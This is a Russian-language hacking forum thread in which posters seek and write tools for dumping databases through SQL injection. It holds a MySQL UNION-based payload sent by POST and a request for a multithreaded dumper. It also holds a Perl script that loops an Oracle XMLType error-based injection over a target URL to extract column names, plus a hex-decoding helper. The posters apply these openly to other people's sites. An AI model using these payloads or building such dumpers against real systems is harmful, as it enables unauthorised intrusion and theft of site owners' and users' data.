привет всем кодерам. Есть скул по POST запросу вида: Code: http://site.com/i.php POST param1=a1¶m2=a2'+UNION+ALL+SELECT+1111,2222,3333,(SELECT concat(0x7e,0x27,unhex(Hex(cast(mytable.mycol as char))),0x27,0x7e) FROM `my_db`.mytable WHERE mytable.mycol=blablabla Order by mycol LIMIT 10,1)--+a Вопрос есть ли какой нит многопоточный дампер который если задать тока LIMIT $X,1 смог дампит с нескольками потоками? Пробовал с rsaundamper но оно не дампит с пост запросами (( PS.прошу извинит так как пока не умею кодит на перл даже простую сорец
привет бро, я конечно уважаю что ты сделал такой крупный проект. Я раньше всегда сливал с тулзой, но в последнее время тулза веде себя не корректно и даже стандартные скули на mysql5 не может слит пишет example.com вместо самого сайта и вырубается. Тем более туда не впустиш то что я давал сверху пример, тут как то по другому. Я спросил обычный дампер как на универсальный дампер rsaUndumper но который может работат с пост запросом тоже(( тут имеет место именно concat(0x7e,0x27,unhex(Hex(cast(mytable.mycol as char))),0x27,0x7e) даже если слит одну колонку с конкатенаций что не справляется тулза
хех думал тут разжел кодинга и даже если нет такого универсального брутера то кто нит запросто может наколбасит пару строк на perl((
Прошу помощи Нашел на сайте SQL inject, но данные выводятся только в виде ошибки, и их очень много а времени перебирать их нету. Встал вопрос автоматизировать как то это дело. И решил что давно пора изучать язык, остановился на Perl. Примерно за час написал скрипт. Code: #! /bin/usr/perl use LWP::Simple; if (@ARGV<1) { print "Enter URL\n"; } my $url=$ARGV[0]; for ($i=1; $i<= 10; $i++) { my $lib1="+and(1)=(select+upper(xmltype(chr(60)||chr(58)||chr(58)||(select+rawtohex(column_name)from(select+column_name,rownum+rnum+from+sys.USER_TAB_COLUMNS+a)where+rnum="; my $lib2=")||chr(58)||chr(58)||chr(62)))from dual)--+"; my $urlsql=$url.$lib1.$i.$lib2; my $content=get $urlsql; open (FILE, "> res.txt"); print FILE $content; close (FILE); open (FILE, "res.txt"); while (<FILE>) { ($rescont,$column,$data)=split('::'); if ($column!=null) { print "$column +"; } } close (FILE); } Знаю что каряво и не правильно, но он выводит первые 10 колонок. Внимание вопрос!!!!! Как правильно написать, и как его оптимизировать. Новую тему создавать не стал. Прошу не флудить
С языком я уже определился. Вопрос по скрипту, как можно отсеять ненужные данные не сохраняя их в файл как у меня.
В смысле, с учебника смотрел, и во многих скриптах так. Добавил в скрипт функцию: Code: sub hex_to_ascii ($) { (my $str = shift) =~ s/([a-fA-F0-9] {2})/chr(hex $1)/eg; return $str; } $column=hex_to_ascii($column); Не знаю так корректно или нет, но у меня работает. Попробую дальше проработать, может кому нибудь ещё пригодится, жду ваших советов.